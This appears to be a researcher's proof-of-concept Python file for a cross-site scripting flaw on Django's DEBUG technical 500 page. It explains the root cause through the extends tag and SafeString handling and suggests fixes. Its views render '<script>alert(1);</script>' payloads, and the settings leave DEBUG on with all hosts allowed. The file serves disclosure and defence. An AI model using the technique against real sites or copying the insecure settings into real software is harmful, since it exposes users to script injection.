1 | """
2 | Proof of Concept for an XSS on the Technical 500 debug page.
3 |
4 | I'm only considering this a *potential* security issue due to the fact that sensitive
5 | variables output on the technical 500 are scrubbed. This relies on so much
6 | user footgunning that it shouldn't actually be something that can happen, but
7 | hey ho.
8 |
9 | Requirements:
10 | ------------
11 | - DEBUG=True to get the technical 500
12 | - Templates much be constructed from at least partial user data.
13 | - TemplateDoesNotExist (or possibly TemplateSyntaxError ... somehow) must be
14 | raised, and the message needs to somehow contain user data.
15 |
16 | The only way I've managed to establish it could even happen is:
17 | - Developer's template system allows construction of templates (e.g Database loader,
18 | or fragments joined together from form output in the admin to dynamically
19 | create CMS templates or whatever)
20 | - Developer's template system must allow for dynamic extends, and for reasons
21 | unknown isn't using variable resolution for it, but is instead doing something
22 | akin to: data = '{{% extends "{}" %}}'.format(template_name), and is
23 | allowing the user to select the base template (e.g. from a dropdown) but isn't
24 | sanitising it (e.g. with a form's ChoicesField)
25 | - Developer has left DEBUG turned on
26 |
27 | Taken altogether, it's a wildly unlikely scenario, and realistically if DEBUG
28 | is on there are probably other problems.
29 |
30 |
31 | Demo
32 | ----
33 |
34 | - Run this file by doing `python te500xss.py runserver`
35 | - Navigate to the /syntax URL to see the apparently intentional
36 | self-inflicted XSS. That's not the XSS we care about...
37 | - Visit /block and /include to see normal expected behaviour; the former doesn't
38 | error, the latter does error but does so safely (despite being the same
39 | error message).
40 | - Visit /extends and see the actual XSS on the 500 error page.
41 |
42 |
43 | How it works:
44 | ------------
45 | Given the string {% extends "anything" %} the "anything" token part is
46 | turned into a Variable (or a FilterExpression wrapping over one). The Variable
47 | is detected as a 'constant' within Variable.__init__ and as such is stored
48 | as self.literal, and optimistically considered safe via mark_safe().
49 |
50 | That it's marked safe is the root of the problem, but unfortunately, that
51 | appears to be a partially undocumented function of DTL - that {{ '<html>' }}
52 | isn't escaped - and tests fail if it's removed. It is documented that the RHS
53 | of filters work that way, and if you extrapolate enough it's readily apparent,
54 | but it's never expressly said or demonstrated.
55 |
56 | Anyway, from there onwards it's a SafeString containing our XSS. The SafeString
57 | is given directly to find_template, which goes to the Engine's find_template.
58 | The Engine.find_template will raise TemplateDoesNotExist and provide the SafeString
59 | as the `name` argument, which is also `args[0]` - the latter is important shortly.
60 |
61 | Because a TemplateDoesNotExist is thrown and render_annotated detects
62 | that the engine is in debug mode, it ultimately calls Template.get_exception_info
63 | which ends up doing str(exception.args[0]) ... but str() on a SafeString returns
64 | the same SafeString instance; that is id(str(my_safe_str)) and id(my_safe_str)
65 | are the same, presumably due to a str() optimisation to avoid copying down in
66 | the C.
67 |
68 | So if the template name given to the extends tag contains HTML (... how?!) it'll
69 | throw, and then the SafeString gets output in the technical 500 as
70 | {{ template_info.message }} but it's already been marked safe, so the HTML is
71 | written directly, rather than escaped.
72 |
73 |
74 | Mitigation ideas
75 | ----------------
76 | This can be fixed in a couple of ways:
77 | - Forcibly coerce the value to an actual string inside of get_exception_info, by
78 | doing something like str(exception.args[0]).strip(). That'd work for all
79 | string subclasses which don't have a custom strip method which does something
80 | clever.
81 | - add escape() to the str(exception.args[0]) call as has been done with
82 | self.source on the lines previous.
83 | - Use |force_escape filter in the technical 500; the |escape filter won't work
84 | because it's actually conditional_escape.
85 | """
86 | import django
87 | from django.conf import settings
88 | from django.http import HttpResponse
89 | from django.template import Template, Context
90 | from django.urls import path
91 |
92 | if not settings.configured:
93 | settings.configure(
94 | SECRET_KEY="??????????????????????????????????????????????????????????",
95 | DEBUG=True,
97 | ALLOWED_HOSTS=("*"),
98 | ROOT_URLCONF=__name__,
101 | {
102 | "BACKEND": "django.template.backends.django.DjangoTemplates",
103 | "DIRS": [],
104 | "APP_DIRS": False,
105 | "OPTIONS": {
106 | "context_processors": [],
107 | },
108 | },
109 | ],
110 | )
111 | django.setup()
112 |
113 |
114 | def valid_syntax(request) -> HttpResponse:
115 | """
116 | This is mostly undocumented in the DTL language docs AFAIK, but apparently
117 | is intentionally supported. It's referenced as
118 | https://docs.djangoproject.com/en/4.0/ref/templates/language/#string-literals-and-automatic-escaping
119 | but only shows it being used on the RHS of a filter, unlike the original
120 | ticket ( https://code.djangoproject.com/ticket/5945 ) which showed using
121 | it as the whole, unescaped value.
122 |
123 | The following tests fail if Variable.__init__ is changed so that:
124 | self.literal = mark_safe(unescape_string_literal(var))
125 | becomes:
126 | self.literal = unescape_string_literal(var)
127 |
128 | FAIL: test_i18n16 (template_tests.syntax_tests.i18n.test_underscore_syntax.I18nStringLiteralTests)
129 | FAIL: test_autoescape_literals01 (template_tests.syntax_tests.test_autoescape.AutoescapeTagTests)
130 | FAIL: test_basic_syntax26 (template_tests.syntax_tests.test_basic.BasicSyntaxTests)
131 | FAIL: test_basic_syntax27 (template_tests.syntax_tests.test_basic.BasicSyntaxTests)
132 |
133 | So that's a non-starter.
134 |
135 | If I ever knew about this functionality, I've long since forgotten it, and
136 | grepping the source for \{\{(\s+?)["'] shows nothing much outside of tests...
137 |
138 | Having {{ '<raw html>' }} work when
139 | {% templatetag %} AND {% verbatim %} AND {% filter %} seems like a weird
140 | historic quirk, though of course I may just be missing some use-case or other.
141 |
142 | Anyway, by having a literal become a SafeString, I can later XSS the
143 | technical 500 page.
144 | """
145 | template = Template("""
146 | This is intentionally supported syntax, but relatively well hidden IMHO.
147 | <hr>
148 | {{ '<script>alert(1);</script>' }}
149 | """)
150 | return HttpResponse(template.render(Context({})))
151 |
152 |
153 | def extends(request) -> HttpResponse:
154 | """
155 | So in the previous view we saw that we can apparently intentionally have
156 | raw HTML within variables and it'll parse OK, possibly so you could
157 | feed it to a filter like {{ '<div>...</div>'|widont }} or something?
158 |
159 | Because the template tag passes the Variable's resolved SafeString to
160 | find_template, and the technical 500 template outputs template_info.message
161 | which is actually TemplateDoesNotExist.args[0], which is the name
162 | argument ... it gets output having been treated as safe ... which it should
163 | be, ordinarily.
164 | """
165 | template = Template("{% extends '<script>alert(1);</script>' %}")
166 | return HttpResponse(template.render(Context({})))
167 |
168 |
169 | def include(request) -> HttpResponse:
170 | """
171 | Note that the include node doesn't express the same problem.
172 | This is because the TemplateDoesNotExist uses select_template which
173 | internally discards the SafeString instance by converting the tuple (which
174 | DOES contain a SafeString) into a string like so:
175 | ', '.join(not_found)
176 | which happens to erase the SafeString somewhere down in C.
177 | """
178 | template = Template("{% include '<script>alert(1);</script>' %}")
179 | return HttpResponse(template.render(Context({})))
180 |
181 |
182 | def block(request) -> HttpResponse:
183 | """
184 | And the block tag doesn't even throw an exception in the first place, because
185 | you can name a block basically anything and never resolves the name.
186 | """
187 | template = Template("{% block '<script>alert(1);</script>' %}{% endblock %}")
188 | return HttpResponse(template.render(Context({})))
189 |
190 |
191 | urlpatterns = [
192 | path("syntax", valid_syntax, name="syntax"),
193 | path("block", block, name="block"),
194 | path("include", include, name="include"),
195 | path("extends", extends, name="extends"),
196 | ]
197 |
198 |
199 | if __name__ == "__main__":
200 | from django.core import management
201 |
202 | management.execute_from_command_line()
203 | else:
204 | from django.core.wsgi import get_wsgi_application
205 |
206 | application = get_wsgi_application()